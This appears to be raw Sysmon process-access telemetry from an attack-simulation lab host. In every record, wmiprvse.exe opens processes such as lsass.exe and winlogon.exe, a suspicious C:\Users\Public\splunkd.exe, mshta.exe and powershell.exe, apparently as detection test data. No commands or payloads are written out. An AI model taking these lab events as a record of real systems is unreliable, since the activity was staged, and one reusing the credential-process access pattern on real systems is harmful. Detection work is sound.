15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-6106-00000000A301}6220C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.882{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 